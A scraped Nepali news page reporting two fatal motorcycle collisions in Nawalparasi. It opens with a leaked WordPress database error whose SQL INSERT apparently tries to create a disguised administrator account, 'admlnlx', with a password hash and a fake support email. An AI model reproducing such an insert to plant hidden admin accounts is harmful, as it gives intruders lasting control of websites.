WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2kI52/bqxIirAzPDH/DXXxJHbMOGi1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 19:44:09', '', 'admlnlx', 'admlnlx')
नवलपरासी,पुस १-
नवलपरासीका दुई छुट्टाछुट्टै स्थानमा भएको सवारी दुर्घटनामा दुई जनाको ज्यान भएको छ ।नवलपरासीको गैंडाकोट ९ थुम्सीमा आज दिउँसो पश्चिमबाट पूर्वतर्फ जाँदै गरेको अनटेस्ट मोटरसाईकल र विपरित दिशाबाट आइरहेको ना २६ प ९२ ८७ नम्बरको स्कुटर आपसमा ठक्कर खाँदा गैंडाकोट १६ अमरापुरीका स्कुटर चालक वर्ष २१ का आशिषराज तिमिल्सिनाको ज्यान गएको हो ।
दुर्घटनामा मोटरसाइकल चालक नवलपरासीको देउराली ५ निवासी २६ वर्षीय हरिकृष्ण बोहोरा घाइते भएका छन् ।ईलाका प्रहरी कार्यालय गैंडाकोटमा प्रहरी निरीक्षक सुवास हमालका अनुसार घाइतेको चितवन भरतपुरमा उपचार भइरहेको छ ।
त्यस्तै नवलपरासीको दुम्किबास ५ दाउन्ने बजारमा भारतीय नम्बर प्लेटको पिकअपले भ्यानले मोटरसाइकललाई ठक्कर दिँदा नवलपरासी बर्दघाट ५ पालडाँडा निवासी २१ वर्षीय आशिष जिसीको घटनास्थलमै ज्यान गएको छ ।
जिल्ला प्रहरी कार्यालय नवलपरासीले दिएको जानकारीअनुसार पश्चिमबाट पूर्वतर्फ आउँदै गरेको युपी ६५ सीटी ३७१७ नम्बरको पिकअप भ्यान र बिपरीत दिशाबाट जाँदै गरेको लु १७ प ११७७ मोटरसाईकल ठक्कर खाँदा दुर्घटना भएको हो ।दुर्घटनामा बर्दघाट ५ सुखानीका बर्ष २० का जितेन्द्र चौधरी गम्भिर घाइते भएका छन् ।